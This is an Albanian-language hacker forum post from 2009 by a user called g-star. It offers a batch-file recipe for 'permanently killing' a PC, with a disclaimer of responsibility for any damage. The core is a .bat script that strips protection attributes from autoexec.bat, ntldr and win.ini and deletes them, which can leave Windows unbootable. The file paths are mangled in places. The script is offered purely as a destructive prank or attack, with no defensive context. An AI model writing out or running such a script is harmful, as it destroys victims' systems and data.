PortalForumCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 fikja e pc pergjithmone vetem me ndihmen e g/star-it (hack3r-boy)

Shko poshtë 
AutoriMesazh
g-star
Administrator
Administrator
avatar

Male Numri i postimeve : 151
Age : 27
Registration date : 24/01/2009

MesazhTitulli: fikja e pc pergjithmone vetem me ndihmen e g/star-it (hack3r-boy)   Sat Feb 14, 2009 7:27 am

fillimisht ne nuk mbajm pergjegjsi per demet qe mund ti shkaktoni ju.


HAPIM notepadin dhe vendosim ket kod:@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.inie ruajm fajllin me qfar do emri nuk o me rendesi mirpo me prapashtesen .bat

per ta ruajtusi bat file tek rubrika text file document nderrojni ne all files.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.cipcop.tk
 
fikja e pc pergjithmone vetem me ndihmen e g/star-it (hack3r-boy)
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Stafi i Forumit :: Ndihme-
Kërce tek: